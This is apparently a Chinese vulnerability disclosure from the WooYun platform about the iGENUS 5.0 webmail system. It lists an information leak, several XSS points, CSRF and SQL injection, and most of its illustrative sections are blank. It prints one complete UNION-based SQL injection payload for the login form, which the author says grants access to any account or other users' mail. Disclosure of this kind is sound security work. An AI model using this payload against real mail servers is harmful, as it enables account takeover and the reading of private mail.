没事的时候下载了iGENUS5.0来看了看，时间紧，只看了个大概。大量政府、学校、科研机构、大型公司在使用这套系统。

先说下我使用的版本和环境：

 

整套程序，没有防注入措施，除邮件标题和外没有放XSS错误，导致漏洞一大堆，以下测试均在魔术引号关闭的情况下进行（php5.4以后魔术引号就默认关闭了）

1、信息泄露（开发者用于调试的功能）：

 

2、各种xss：

反射性：

 

 

发送邮件时，邮件中插入图片，图片地址和描述存在xss：

邮件签名xss：

系统日志xss可以x管理员（域管理员和系统管理员），还可以csrf（大家自己去试）：

 

3、注入存在性：

 

 

4、登陆框SQL注入导致登陆任意存在的账户，或者登陆自己的账户查看别人的邮件（iGENUS的邮件存放在文件夹中）：

登陆框输入：

baidu' and 1=2 union select 9999,'baidu','mydomains.com','$1$cKT9CGj7$svBg/NeQckI2rvfm2GWc40',0,0,'','/home/vpopmail/domains/mydomains.com/baidu','104857600S','1','2013-12-31 16:39:38','2015-12-31 00:00:00',1,1048,10,'/home/netdisk/mydomains.com/../',0,1048,0,1,0,0 from vpopmail where 'a'='a 

本文由clzzy原创，首发乌云http://www.wooyun.org/bugs/wooyun-2014-047768

​